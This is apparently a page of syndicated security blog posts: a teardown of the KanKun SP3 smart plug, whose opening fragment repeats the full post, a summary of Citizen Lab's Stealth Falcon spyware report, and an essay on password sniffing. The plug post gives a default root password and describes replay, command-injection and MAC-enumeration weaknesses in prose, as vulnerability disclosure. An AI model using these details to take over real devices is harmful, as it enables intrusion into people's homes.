I’d grabbed the apk for the app and a copy of jadx, an incredibly useful piece of code that’s surprisingly good at turning compiled Android apps into something resembling Java source. I dug through that for a while before figuring out that before packets were being sent, they were being handed off to some sort of encryption code. I couldn’t find that in the app, but there was a native ARM library shipped with it. Running strings on that showed functions with names matching the calls in the Java code, so that made sense. There were also references to AES, which explained why when I ran tcpdump I only saw bizarre garbage packets.

But what was surprising was that most of these packets were substantially similar. There were a load that were identical other than a 16-byte chunk in the middle. That plus the fact that every payload length was a multiple of 16 bytes strongly indicated that AES was being used in ECB mode. In ECB mode each plaintext is split up into 16-byte chunks and encrypted with the same key. The same plaintext will always result in the same encrypted output. This implied that the packets were substantially similar and that the encryption key was static.

Some more digging showed that someone had figured out the encryption key last year, and that someone else had written some tools to control the plug without needing to modify it. The protocol is basically ascii and consists mostly of the MAC address of the target device, a password and a command. This is then encrypted and sent to the device’s IP address. The device then sends a challenge packet containing a random number. The app has to decrypt this, obtain the random number, create a response, encrypt that and send it before the command takes effect. This avoids the most obvious weakness around using ECB – since the same plaintext always encrypts to the same ciphertext, you could just watch encrypted packets go past and replay them to get the same effect, even if you didn’t have the encryption key. Using a random number in a challenge forces you to prove that you actually have the key.

At least, it would do if the numbers were actually random. It turns out that the plug is just calling rand(). Further, it turns out that it never calls srand(). This means that the plug will always generate the same sequence of challenges after a reboot, which means you can still carry out replay attacks if you can reboot the plug. Strong work.

But there was still the question of how the remote control works, since the code on github only worked locally. tcpdumping the traffic from the server and trying to decrypt it in the same way as local packets worked fine, and showed that the only difference was that the packet started “wan” rather than “lan”. The server decrypts the packet, looks at the MAC address, re-encrypts it and sends it over the tunnel to the plug that registered with that address.

That’s not really a great deal of authentication. The protocol permits a password, but the app doesn’t insist on it – some quick playing suggests that about 90% of these devices still use the default password. And the devices are all based on the same wifi module, so the MAC addresses are all in the same range. The process of sending status check packets to the server with every MAC address wouldn’t take that long and would tell you how many of these devices are out there. If they’re using the default password, that’s enough to have full control over them.

There’s some other failings. The github repo mentioned earlier includes a script that allows arbitrary command execution – the wifi configuration information is passed to the system() command, so leaving a semicolon in the middle of it will result in your own commands being executed. Thankfully this doesn’t seem to be true of the daemon that’s listening for the remote control packets, which seems to restrict its use of system() to data entirely under its control. But even if you change the default root password, anyone on your local network can get root on the plug. So that’s a thing. It also downloads firmware updates over http and doesn’t appear to check signatures on them, so there’s the potential for MITM attacks on the plug itself. The remote control server is on AWS unless your timezone is GMT+8, in which case it’s in China. Sorry, Western Australia.

It’s running Linux and includes Busybox and dnsmasq, so plenty of GPLed code. I emailed the manufacturer asking for a copy and got told that they wouldn’t give it to me, which is unsurprising but still disappointing.

The use of AES is still somewhat confusing, given the relatively small amount of security it provides. One thing I’ve wondered is whether it’s not actually intended to provide security at all. The remote servers need to accept connections from anywhere and funnel decent amounts of traffic around from phones to switches. If that weren’t restricted in any way, competitors would be able to use existing servers rather than setting up their own. Using AES at least provides a minor obstacle that might encourage them to set up their own server.

Overall: the hardware seems fine, the software is shoddy and the security is terrible. If you have one of these, set a strong password. There’s no rate-limiting on the server, so a weak password will be broken pretty quickly. It’s also infringing my copyright, so I’d recommend against it on that point alone.

comment count unavailable comments

I’ve bought some more awful IoT stuff

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/43486.html

I bought some awful WiFi lightbulbs a few months ago. The short version: they introduced terrible vulnerabilities on your network, they violated the GPL and they were also just bad at being lightbulbs. Since then I’ve bought some other Internet of Things devices, and since people seem to have a bizarre level of fascination with figuring out just what kind of fractal of poor design choices these things frequently embody, I thought I’d oblige.

Today we’re going to be talking about the KanKun SP3, a plug that’s been around for a while. The idea here is pretty simple – there’s lots of devices that you’d like to be able to turn on and off in a programmatic way, and rather than rewiring them the simplest thing to do is just to insert a control device in between the wall and the device andn ow you can turn your foot bath on and off from your phone. Most vendors go further and also allow you to program timers and even provide some sort of remote tunneling protocol so you can turn off your lights from the comfort of somebody else’s home.

The KanKun has all of these features and a bunch more, although when I say “features” I kind of mean the opposite. I plugged mine in and followed the install instructions. As is pretty typical, this took the form of the plug bringing up its own Wifi access point, the app on the phone connecting to it and sending configuration data, and the plug then using that data to join your network. Except it didn’t work. I connected to the plug’s network, gave it my SSID and password and waited. Nothing happened. No useful diagnostic data. Eventually I plugged my phone into my laptop and ran adb logcat, and the Android debug logs told me that the app was trying to modify a network that it hadn’t created. Apparently this isn’t permitted as of Android 6, but the app was handling this denial by just trying again. I deleted the network from the system settings, restarted the app, and this time the app created the network record and could modify it. It still didn’t work, but that’s because it let me give it a 5GHz network and it only has a 2.4GHz radio, so one reset later and I finally had it online.

The first thing I normally do to one of these things is run nmap with the -O argument, which gives you an indication of what OS it’s running. I didn’t really need to in this case, because if I just telnetted to port 22 I got a dropbear ssh banner. Googling turned up the root password (“p9z34c”) and I was logged into a lightly hacked (and fairly obsolete) OpenWRT environment.

It turns out that here’s a whole community of people playing with these plugs, and it’s common for people to install CGI scripts on them so they can turn them on and off via an API. At first this sounds somewhat confusing, because if the phone app can control the plug then there clearly is some kind of API, right? Well ha yeah ok that’s a great question and oh good lord do things start getting bad quickly at this point.

I’d grabbed the apk for the app and a copy of jadx, an incredibly useful piece of code that’s surprisingly good at turning compiled Android apps into something resembling Java source. I dug through that for a while before figuring out that before packets were being sent, they were being handed off to some sort of encryption code. I couldn’t find that in the app, but there was a native ARM library shipped with it. Running strings on that showed functions with names matching the calls in the Java code, so that made sense. There were also references to AES, which explained why when I ran tcpdump I only saw bizarre garbage packets.

But what was surprising was that most of these packets were substantially similar. There were a load that were identical other than a 16-byte chunk in the middle. That plus the fact that every payload length was a multiple of 16 bytes strongly indicated that AES was being used in ECB mode. In ECB mode each plaintext is split up into 16-byte chunks and encrypted with the same key. The same plaintext will always result in the same encrypted output. This implied that the packets were substantially similar and that the encryption key was static.

Some more digging showed that someone had figured out the encryption key last year, and that someone else had written some tools to control the plug without needing to modify it. The protocol is basically ascii and consists mostly of the MAC address of the target device, a password and a command. This is then encrypted and sent to the device’s IP address. The device then sends a challenge packet containing a random number. The app has to decrypt this, obtain the random number, create a response, encrypt that and send it before the command takes effect. This avoids the most obvious weakness around using ECB – since the same plaintext always encrypts to the same ciphertext, you could just watch encrypted packets go past and replay them to get the same effect, even if you didn’t have the encryption key. Using a random number in a challenge forces you to prove that you actually have the key.

At least, it would do if the numbers were actually random. It turns out that the plug is just calling rand(). Further, it turns out that it never calls srand(). This means that the plug will always generate the same sequence of challenges after a reboot, which means you can still carry out replay attacks if you can reboot the plug. Strong work.

But there was still the question of how the remote control works, since the code on github only worked locally. tcpdumping the traffic from the server and trying to decrypt it in the same way as local packets worked fine, and showed that the only difference was that the packet started “wan” rather than “lan”. The server decrypts the packet, looks at the MAC address, re-encrypts it and sends it over the tunnel to the plug that registered with that address.

That’s not really a great deal of authentication. The protocol permits a password, but the app doesn’t insist on it – some quick playing suggests that about 90% of these devices still use the default password. And the devices are all based on the same wifi module, so the MAC addresses are all in the same range. The process of sending status check packets to the server with every MAC address wouldn’t take that long and would tell you how many of these devices are out there. If they’re using the default password, that’s enough to have full control over them.

There’s some other failings. The github repo mentioned earlier includes a script that allows arbitrary command execution – the wifi configuration information is passed to the system() command, so leaving a semicolon in the middle of it will result in your own commands being executed. Thankfully this doesn’t seem to be true of the daemon that’s listening for the remote control packets, which seems to restrict its use of system() to data entirely under its control. But even if you change the default root password, anyone on your local network can get root on the plug. So that’s a thing. It also downloads firmware updates over http and doesn’t appear to check signatures on them, so there’s the potential for MITM attacks on the plug itself. The remote control server is on AWS unless your timezone is GMT+8, in which case it’s in China. Sorry, Western Australia.

It’s running Linux and includes Busybox and dnsmasq, so plenty of GPLed code. I emailed the manufacturer asking for a copy and got told that they wouldn’t give it to me, which is unsurprising but still disappointing.

The use of AES is still somewhat confusing, given the relatively small amount of security it provides. One thing I’ve wondered is whether it’s not actually intended to provide security at all. The remote servers need to accept connections from anywhere and funnel decent amounts of traffic around from phones to switches. If that weren’t restricted in any way, competitors would be able to use existing servers rather than setting up their own. Using AES at least provides a minor obstacle that might encourage them to set up their own server.

Overall: the hardware seems fine, the software is shoddy and the security is terrible. If you have one of these, set a strong password. There’s no rate-limiting on the server, so a weak password will be broken pretty quickly. It’s also infringing my copyright, so I’d recommend against it on that point alone.

comment count unavailable comments

Stealth Falcon: New Malware from (Probably) the UAE

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2016/06/stealth_falcon_.html

Citizen Lab has the details:

This report describes a campaign of targeted spyware attacks carried out by a sophisticated operator, which we call Stealth Falcon. The attacks have been conducted from 2012 until the present, against Emirati journalists, activists, and dissidents. We discovered this campaign when an individual purporting to be from an apparently fictitious organization called “The Right to Fight” contacted Rori Donaghy. Donaghy, a UK-based journalist and founder of the Emirates Center for Human Rights, received a spyware-laden email in November 2015, purporting to offer him a position on a human rights panel. Donaghy has written critically of the United Arab Emirates (UAE) government in the past, and had recently published a series of articles based on leaked emails involving members of the UAE government.

Circumstantial evidence suggests a link between Stealth Falcon and the UAE government. We traced digital artifacts used in this campaign to links sent from an activist’s Twitter account in December 2012, a period when it appears to have been under government control. We also identified other bait content employed by this threat actor. We found 31 public tweets sent by Stealth Falcon, 30 of which were directly targeted at one of 27 victims. Of the 27 targets, 24 were obviously linked to the UAE, based on their profile information (e.g., photos, “UAE” in account name, location), and at least six targets appeared to be operated by people who were arrested, sought for arrest, or convicted in absentia by the UAE government, in relation to their Twitter activity.

The attack on Donaghy — and the Twitter attacks — involved a malicious URL shortening site. When a user clicks on a URL shortened by Stealth Falcon operators, the site profiles the software on a user’s computer, perhaps for future exploitation, before redirecting the user to a benign website containing bait content. We queried the URL shortener with every possible short URL, and identified 402 instances of bait content which we believe were sent by Stealth Falcon, 73% of which obviously referenced UAE issues. Of these URLs, only the one sent to Donaghy definitively contained spyware. However, we were able to trace the spyware Donaghy received to a network of 67 active command and control (C2) servers, suggesting broader use of the spyware, perhaps by the same or other operators.

News story.

Technology betrays everyone

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/05/technology-betrays-everyone.html

Kelly Jackson Higgins has a story about how I hacked her 10 years ago, by sniffing her email password via WiFi and displaying it on screen. It wasn’t her fault — it was technology’s fault. Sooner or later, it will betray you.

The same thing happened to me at CanSecWest around the year 2001, for pretty much exactly the same reasons. I think it was HD Moore who sniffed my email password. The thing is, I’m an expert, who writes tools that sniff these passwords, so it wasn’t like I was an innocent party here. Instead, simply opening my laptop with Outlook running the background was enough for it to automatically connect to WiFi, then connect to a POP3 server across the Internet. I thought I was in control of the evil technology — but this incident proved I wasn’t.

By 2006, though, major email services were now supporting email wholly across SSL, so that this would no longer happen — in theory. In practice, they still left the old non-encrypted ports open. Users could secure themselves, if they tried hard, but they usually weren’t secured.

Today, in 2016, the situation is much better. If you use Yahoo! Mail or GMail, you don’t even have the option to not encrypt — even if you wanted to. Unfortunately, many people are using old services that haven’t upgraded, like EarthLink or Network Solutions. These were popular services during the dot-com era 20 years ago, but haven’t evolved since. They spend enough to keep the lights on, but not enough to keep up with the times. Indeed, EarthLink doesn’t even allow for encryption even if you wanted it, as an earlier story this year showed.

My presentation in 2006 wasn’t about email passwords, but about all the other junk that leaks private information. Specifically, I discussed WiFi MAC addresses, and how they can be used to track mobile devices. Only in the last couple years have mobile phone vendors done something to change this. The latest version of iOS 9 will now randomize the MAC address, so that “they” can no longer easily track you by it.

The point of this post is this. If you are thinking “surely my tech won’t harm me in stupid ways”, you are wrong. It will. Even if it says on the box “100% secure”, it’s not secure. Indeed, those who promise the most often deliver the least. Those on the forefront of innovation (Apple, Google, and Facebook), but even they must be treated with a health dose of skepticism.

So what’s the answer? Paranoia and knowledge. First, never put too much faith in the tech. It’s not enough, for example, for encryption to be an option — you want encryption enforced so that unencrypted is not an option. Second, learn how things work. Learn why SSL works the way it does, why it’s POP3S and not POP3, and why “certificate warnings” are a thing. The more important security is to you, the more conservative your paranoia and the more extensive your knowledge should become.

Appendix: Early this year, the EFF (Electronic Freedom Foundation) had a chart of various chat applications and their features (end-to-end, open-source, etc.). On one hand, it was good information. On the other hand, it was bad, in that it still wasn’t enough for the non-knowledgeable to make a good decision. They could easily pick a chat app that had all the right features (green check-marks across the board), but still be one that could easily be defeated.

Likewise, recommendations to use “Tor” are perilous. Tor is indeed a good thing, but if you blindly trust it without understanding it, it will quickly betray you. If your adversary is the secret police of your country cracking down on dissidents, then you need to learn a lot more about how Tor works before you can trust it.

Notes: I’m sorta required to write this post, since I can’t let it go unremarked that the same thing happened to me — even though I know better.